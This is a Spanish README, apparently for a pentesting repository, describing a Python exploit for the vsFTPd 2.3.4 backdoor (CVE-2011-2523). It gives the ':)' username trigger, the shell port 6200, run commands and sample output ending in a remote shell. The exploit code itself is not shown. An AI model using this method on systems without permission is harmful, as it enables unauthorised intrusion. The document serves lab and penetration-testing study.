Exploit en Python para la puerta trasera de vsFTPd 2.3.4 (CVE-2011-2523) que desencadena un shell oculto en el puerto 6200 mediante un nombre de usuario manipulado, permitiendo la ejecución remota de comandos para pruebas de penetración autorizadas.
Este proyecto demuestra la explotación de la vulnerabilidad de backdoor de vsFTPd 2.3.4 (CVE-2011-2523) utilizando Python y pwntools.
Aviso: Este proyecto es solo para fines educativos y de pruebas de penetración autorizadas. NO lo utilices contra sistemas sin permiso.
👉 La versión vulnerable de vsFTPd contiene un backdoor malicioso que se activa cuando se utiliza un nombre de usuario que contiene :) durante el inicio de sesión.
vsFTPd 2.3.4USER hello:))pwntoolsInstalar dependencias:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
El objetivo debe estar ejecutando vsFTPd 2.3.4 (versión vulnerable)
El puerto 6200 debe ser accesible
Funciona mejor en entornos de laboratorio como: